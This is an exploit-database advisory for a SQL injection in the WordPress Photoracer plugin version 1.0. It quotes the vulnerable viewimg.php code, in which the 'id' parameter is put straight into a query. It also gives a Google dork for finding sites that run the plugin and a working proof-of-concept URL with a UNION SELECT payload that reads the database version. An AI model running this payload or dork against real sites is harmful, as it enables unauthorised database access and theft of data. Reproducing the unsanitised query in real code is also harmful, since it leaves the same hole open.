[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WordPress Photoracer plugin <= 1.0 SQL Injection Vulnerability
# Published : 2011-08-26
# Author :
# Previous Title : WordPress Js-appointment plugin <= 1.5 SQL Injection Vulnerability
# Next Title : WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability


# Exploit Title: WordPress Photoracer plugin <= 1.0 SQL Injection Vulnerability
# Google Dork: inurl:"wp-content/plugins/photoracer/viewimg.php"
# Date: 2011-08-26
# Author: evilsocket ( evilsocket [at] gmail [dot] com )
# Software Link: http://wordpress.org/extend/plugins/photoracer/
# Version: 1.0

---------------
Vulnerable code
---------------

[ viewimg.php line 16 ]

$imgid = $_REQUEST['id'];
$q1 = "select raceid, wpuid, imgid, imgpath, imgname, imgcomment, sumvotes, imgcountview, tinsert from ".
	$wpdb->prefix."photoracer where imgid=$imgid";	

$out = $wpdb->get_row($q1);

---
PoC
---

http://www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1 UNION SELECT 0,1,2,3,4,VERSION(),6,7,8